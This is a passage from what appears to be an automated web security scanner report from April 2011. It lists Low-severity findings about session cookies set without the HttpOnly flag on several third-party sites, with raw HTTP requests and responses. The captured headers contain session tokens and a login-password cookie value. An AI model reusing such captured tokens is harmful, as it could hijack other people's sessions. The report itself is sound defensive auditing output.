<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
17.34. https://secure.trust-guard.com/ResetPassword.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ResetPassword.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:02 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=810ck8u50d3r715ut9f1d8tvf2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
17.35. http://shopping.netsuite.com/app/site/hit/tracker.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /app/site/hit/tracker.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /app/site/hit/tracker.nl?c=438708&n=1&type=store&sc=3&category=-103&it=&itemid=&referer=http%3A//burp/show/23 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051&productId=5051
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); NLPromocode=438708_; promocode=; __utmz=1.1303746326.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=1.1117720747.1303736410.1303741547.1303746326.3; __utmc=1; __utmb=1.1.10.1303746326; mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:45:16 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Content-Length: 0
Expires: 0
NS_RTIMER_COMPOSITE: -2135942869:73686F702D6A6176613031352E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=yJkkN1XMPgc4vJyc25bDLgWnGycR1m3pGn8Ry1yBQrmTN9S58R3JxF2JkqtnqpXQ52HHJFhnSnNHhGrtKrkGt83m6BvxPQ91mB7qpR7vvpYw3sWVcwXLKrLDp4lLGz5T!731744848; path=/
Set-Cookie: NLShopperId=rcHW8415AciYvvMS; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:45:16 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8

17.36. http://shopping.netsuite.com/app/site/query/additemtocart.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /app/site/query/additemtocart.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303736347554-914602&productId=1650 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 62

buyid=1650&Submit.x=43&Submit.y=8&c=438708&qtyadd=1&promocode=

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 12:59:54 GMT
Server: Apache
Location: /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence=
Expires: 0
NS_RTIMER_COMPOSITE: 1120473518:73686F702D6A6176613030332E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=mvcnN1wK94GbYGym1LHB3yTs2BZr95jnRnSsg8T7DSWtbMRrnz2jSQhVXgBz1h5FmvJJRnm7G9v0khqbf08h4CZVwXzh2xQ10sHch9Mv5nsHgKz9z2JDTpTGpvdc67Ch!719211912; path=/
Set-Cookie: NLVisitorId=rcHW8415ATCkvpg2; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLShopperId=rcHW8415ATukvi6P; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:56 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

17.37. http://shopping.netsuite.com/core/styles/pagestyles.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /core/styles/pagestyles.nl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /core/styles/pagestyles.nl?ct=103&bglt=F2F4F6&bgmd=FFFFFF&bgdk=737A82&bgon=6f7a8e&bgoff=878fa2&bgbar=878fa2&tasktitletext=ffffff&crumbtext=ffffff&headertext=ffffff&ontab=ffffff&offtab=ffffff&text=000000&link=000000&bgbody=FFFFFF&bghead=FFFFFF&portlet=FFFFFF&portletlabel=000000&bgbutton=F2F4F6&bgrequiredfld=ffffff&font=Arial%2CHelvetica%2Csans-serif&size_site_content=10pt&size_site_title=10pt&size=1.0&nlinputstyles=T&NS_VER=2011.1.0&3 HTTP/1.1
Accept: */*
Referer: http://shopping.netsuite.com/s.nl?c=438708&n=1
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: shopping.netsuite.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=NQZkN1GDlyzQCQVYjTjhvD8NGnBvydlJ1XVDfphhhgnnYL1p4BDYQyCRjWnBmn1zPvnlT3tX4RF6Gby13Wtm3KjKDptP6whcYVPYpNyyTMbcjFMnMg5vrGB6pBlvPLWD!-2139436563; NLVisitorId=rcHW8495AS0gDkNQ; NLShopperId=rcHW8495AT0gDvdP; NS_VER=2011.1.0

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:11:04 GMT
Server: Apache
Expires: Tue, 26 Apr 2011 06:15:04 GMT
Last-Modified: Mon, 25 Apr 2011 15:11:04 GMT
NS_RTIMER_COMPOSITE: 2009151588:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=k5YGN1PLTZzmR0nzLGhnzQDvz2fmnVmwP08wLTCLgBcwkdN2QGGlyJx1nF2fmWcBRhvGwTDryHVlyqhcZ9X4CPL6BCjGyp8jLpRXjhGgycX124RYS3rJvDj8xCfCGnvC!-2139436563; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/css; charset=UTF-8
Content-Length: 69366

.iArrowLeft, .iArrowRight { display:inline-block; height:15px; width:16px; margin: 0 2px; background: url(/images/chiles/dashboard_icons.png) no-repeat; text-decoration: none; zoom:1}
.iArrowLeft { ma
...[SNIP]...
17.38. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&n=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: shopping.netsuite.com
Pragma: no-cache

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:44 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1584514099:73686F702D6A6176613031362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=GQy1N1GGvj7DswgGhDMN2ZhvJv4H3X6nxLLhgvh11z7mmH1pQQ4GSVvXYgJ34W5fnv0yBWQG4pfxkG9ZnT7C6lLPHblCH3vLW4lLc2H2czvnsTyvTSZpJyCty72LlGB1!-363664704; path=/
Set-Cookie: NLVisitorId=rcHW8495AXwkDiG7; domain=shopping.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:45 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AYwkDsle; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 14:26:45 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=shopping.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 101978


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Product Catalog</title>


<script type="text/javascript">
var gaJsHost = (("https:" == document.location
...[SNIP]...
17.39. http://sorry.google.com/sorry/Captcha  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sorry.google.com
Path:   /sorry/Captcha

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sorry/Captcha?continue=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmalware%2Bvirus&id=5949669040493980881&captcha=ditiesc&submit=Submit HTTP/1.1
Host: sorry.google.com
Proxy-Connection: keep-alive
Referer: http://sorry.google.com/sorry/?continue=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmalware%2Bvirus
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf; S=sorry=WbnEk7itoTuIPssOyKDfZA

Response

HTTP/1.1 200 OK
Set-Cookie: GDSESS=ID=5291787839c86cd1:EX=1303757535:S=ADSvE-dYLqGVZRU9goNPGWtIQhblZ_kcyw; path=/; domain=google.com; expires=Mon, 25-Apr-2011 18:52:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=malware+virus
Date: Mon, 25 Apr 2011 15:52:15 GMT
Content-Type: text/html; charset=UTF-8
Server: GCS/1.0
Content-Length: 494
X-XSS-Protection: 1; mode=block
Expires: Mon, 25 Apr 2011 15:52:15 GMT

<HTML><HEAD>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>Redirecting</TITLE>
<META HTTP-EQUIV="refresh" content="1; url=http://www.google.com/search?sourceid=chrome&amp;i
...[SNIP]...
17.40. https://support.comodo.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.comodo.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:47:08 GMT
Server: Apache
Set-Cookie: SWIFT_sessionid40=3cdw2l8ir5jntocrfhfyvrg8o00usui3; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
17.41. https://support.trust-guard.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:58:36 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_sessionid40=6wpcfc08xikijf34l3vxhi68m4979l9c; path=/
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 14136


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
17.42. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php?loginresult=-5&group=default&_m=tickets&_a=submit HTTP/1.1
Host: support.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SWIFT_loginpassword=DErwC5IL14LhnSqA7IFm011b3Yjo0HD7Sizs0xht1wo%3D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_loginemail=deleted; SWIFT_sessionid40=dwygqqtavu1d244w838kq6z6jm9eea2r; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9;

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:36:22 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Tue, 24-Apr-2012 19:36:23 GMT; path=/
Set-Cookie: SWIFT_sessionid40=deleted; expires=Sun, 25-Apr-2010 19:36:26 GMT; path=/
Set-Cookie: SWIFT_sessionid40=6z07f147s5rhj37palvjs6av8ek7h9dy; path=/
Connection: close
Content-Type: text/html
Content-Length: 14166


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-e
...[SNIP]...
17.43. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:08:52 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_sessionid40=15yhwgyyrywfvi1oedn98l4yai6tko82; path=/
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 14136


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
17.44. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email= HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:15 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Cache-Control: max-age=3600, must-revalidate
Expires: Tue, 26 Apr 2011 18:59:16 GMT
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Set-Cookie: SWIFT_sessionid80=d6s5jfqcgng25ic49cjgklsipk7trq7w; path=/
Set-Cookie: SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; path=/
Content-Type: text/javascript
Content-Length: 11516

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessio
...[SNIP]...
17.45. http://t5.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t5.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackalyze.asp?r=https%3A//store.manageengine.com/service-desk/index.html&p=https%3A//www.manageengine.com/network-performance-management.html&i=18004 HTTP/1.1
Host: t5.trackalyzer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=241848410610538

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 12:15:25 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Location: http://t5.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=https%3A%2F%2Fwww%2Emanageengine%2Ecom%2Fnetwork%2Dperformance%2Dmanagement%2Ehtml; expires=Tue, 26-Apr-2011 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSATDSTDS=GNAEFPICCPFPBHIMPOCEICLB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t5.trackalyzer.com/dot.gif">here</a>.</body>
17.46. http://tengrinews.kz/tag/891/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tengrinews.kz
Path:   /tag/891/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:34:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.3-2
Set-Cookie: PHPSESSID=2kh13g87ng9vfofjh75vcvpsb3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22992c6a53539ed93969b86244758fda88%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303742049%22%3B%7D214a8e57fbabe8f7012a7d490d65daa7; expires=Thu, 28-Apr-2011 14:34:09 GMT; path=/
Vary: Accept-Encoding
Content-Length: 32979

<!DOCTYPE html>
<html>
<head>
<title>Tengrinews.kz : .............. .................... .... ..............</title>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta
...[SNIP]...
17.47. http://www.customermagnetism.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.customermagnetism.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.customermagnetism.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:03:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=5640f44c05a437bcbee56d65bbd77ffb; path=/
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 28700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search Engine
...[SNIP]...
17.48. http://www.fusionvm.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fusionvm.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.fusionvm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 154
Content-Type: text/html
Location: https://www.fusionvm.com/FusionVM
X-Powered-By: ASP.NET
